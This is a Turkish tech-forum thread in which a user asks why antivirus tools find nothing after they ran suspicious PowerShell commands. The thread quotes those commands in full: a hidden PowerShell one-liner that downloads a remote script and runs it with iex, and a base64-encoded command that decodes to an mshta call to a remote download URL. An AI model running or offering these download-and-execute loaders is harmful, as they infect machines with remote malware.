PowerShell'de çalıştırılan virüsü Malwarebytes ve Defender bulamıyor

firtina44 · 18 Ocak 2025

Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod:

powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

.run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Essex · 18 Ocak 2025

Malwarebytes ayarlarında Rootkit tarama özelliği var onu açıp tarayın bir de. İçin rahat etmez ise Kaspersky ile tarat bir de.

firtina44 · 18 Ocak 2025

Essex dedi:
Malwarebytes ayarlarında Rootkit tarama özelliği var onu açıp tarayın bir de. İçin rahat etmez ise Kaspersky ile tarat bir de.

Rootkit açık yaptım taramayı hocam.

29 · 18 Ocak 2025

firtina44 dedi:
Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod:

powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text .run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.

firtina44 · 18 Ocak 2025

29 dedi:
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290

Sorun olmaz mı yani hocam?

29 dedi:
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Bu kodun çözümlenmiş hali bu.
mshta https://clicktogo.click/downloads/tr08
İsterseniz bir de bu siteye bakın hocam.

29 · 18 Ocak 2025

firtina44 dedi:
Sorun olmaz mı yani hocam?

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Bu kodun çözümlenmiş hali bu.
mshta https://clicktogo.click/downloads/tr08
İsterseniz bir de bu siteye bakın hocam.

Siz adam mi avlamaya calisiyorsunuz acaba?

Ve hayir bu da calismiyor eger DNSim engellemiyorsa.

3399 · 18 Ocak 2025

Bu komutları ne diye çalıştırdın? Birisi mi kandırdı çalıştır diye?

PowerShell'de çalıştırılan virüsü Malwarebytes ve Defender bulamıyor

Detaylar

firtina44

Gelişen

Essex

Bilgin

firtina44

Gelişen

29

Üstün

firtina44

Gelişen

29

Üstün

3399

Uzman

Benzer konular

PowerShell'de çalıştırılan virüsü Malwarebytes ve Defender bulamıyor

firtina44

Gelişen

Essex

Bilgin

firtina44

Gelişen

29

Üstün

firtina44

Gelişen

29

Üstün

3399

Uzman

Benzer konular

Privacy & Transparency

Privacy & Transparency